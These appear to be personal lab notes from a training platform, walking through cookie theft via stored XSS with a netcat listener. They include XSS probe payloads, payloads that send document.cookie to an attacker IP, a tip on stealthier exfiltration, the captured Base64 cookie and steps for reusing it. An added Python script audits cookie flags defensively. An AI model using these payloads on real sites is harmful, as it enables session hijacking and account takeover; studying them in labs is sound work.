OBTAINING SESSION COOKIES (NETCAT SERVER)

#discovery
root@oco:~$ BROWSER > {targetSite:port}
 input field 1: "><img src=x onerror=prompt(document.domain)>
 input field 2: "><img src=x onerror=confirm(1)>
 input field 3: "><img src=x onerror=alert(1)>

 * this will identify which field is vulnerable to XSS
 
 * document.domain is used to confirm that the JavaScript executes on the 
    actual domain and not in a sandboxed environment. 
     - JavaScript executing in a sandboxed environment blocks most client-side 
       attacks, although sandbox escapes exist
       
 * if no automatic triggers occur, utilize the site/page button to trigger them
 
#check if HTTPOnly is "off" using Web Developer Tools
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
 HttpOnly: False
 Secure: False
 SameSite: None
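Added example, not part of these notes: a Python audit of raw Set-Cookie response headers that reports the same three flags checked above (HttpOnly, Secure, SameSite), so the weak configuration can be spotted from the server's headers instead of by hand in the browser. The sample headers are constructed; the first mirrors the flag values shown above.

```python
"""Audit Set-Cookie headers for HttpOnly / Secure / SameSite weaknesses."""
from dataclasses import dataclass, field
from typing import List


@dataclass
class CookieAudit:
    name: str
    httponly: bool
    secure: bool
    samesite: str  # "Strict", "Lax", "None", or "" when the attribute is absent
    findings: List[str] = field(default_factory=list)


def audit_set_cookie(header: str) -> CookieAudit:
    """Parse one Set-Cookie header value and flag weak attributes."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for attr in parts[1:]:
        key, _, value = attr.partition("=")
        attrs[key.strip().lower()] = value.strip()
    httponly = "httponly" in attrs
    secure = "secure" in attrs
    samesite = attrs.get("samesite", "").capitalize()  # "" when absent
    audit = CookieAudit(name, httponly, secure, samesite)
    if not httponly:
        audit.findings.append("missing HttpOnly: value is readable via document.cookie")
    if not secure:
        audit.findings.append("missing Secure: cookie is also sent over plaintext HTTP")
    if samesite == "None" and not secure:
        audit.findings.append("SameSite=None without Secure: Chromium rejects the cookie")
    elif samesite == "":
        audit.findings.append("missing SameSite: relies on the browser default")
    return audit


def audit_headers(headers: List[str]) -> List[CookieAudit]:
    return [audit_set_cookie(h) for h in headers]


# constructed sample headers: weak (as in the notes above) and hardened
SAMPLE_HEADERS = [
    "auth-session=s%3AQZOROUpdXhN0; Path=/; SameSite=None",
    "auth-session=s%3AQZOROUpdXhN0; Path=/; HttpOnly; Secure; SameSite=Lax",
]

if __name__ == "__main__":
    for a in audit_headers(SAMPLE_HEADERS):
        print(f"{a.name}: {'OK' if not a.findings else '; '.join(a.findings)}")
```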
root@oco:~$ BROWSER > {targetSite:port}
 vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
 
 * We don't necessarily have to assign window.location, which redirects the victim. 
   We can use fetch(), which sends the data (cookies) to our server without any 
   redirect. This is the stealthier option.
 
 * another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>
 
root@oco:~$ nc -nlvp 8000
 listening on [any] 8000 ...
#expected victim actions
root@target:~$ BROWSER > New Private Window > {targetSite:port}
 * log in to the application 
 
root@target:~$ BROWSER > http://xss.htb.net/[email protected]
 * view the public profile
    - this is the attacker-controlled public profile that hosts the cookie-stealing payload via the stored XSS vulnerability

 * the moment the target hovers over the "test" element, the script triggers and sends the target's cookie data to the attacker's listener

root@oco:~$ netcat...
 listening on [any] 8000 ...
 connect to [10.10.14.36] from (UNKNOWN) [10.10.14.36] 37106
 GET /?cookie=YXV0aC1zZXNzaW9...
 
 * the cookie arrives as a Base64 value because btoa() Base64-encodes the cookie string
 
#decode
root@oco:~$ BROWSER > {anySite} > F12 > Console
 input: atob("YXV0aC1zZXNzaW9...") 
 output: auth-session=s%3AQZOROUpdXhN0
 
root@oco:~$ BROWSER > New Private Window > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN}
 Name: {auth-session}
 Value: {cookieValue}
 
 * refresh the target page so the request is sent with the inserted cookie
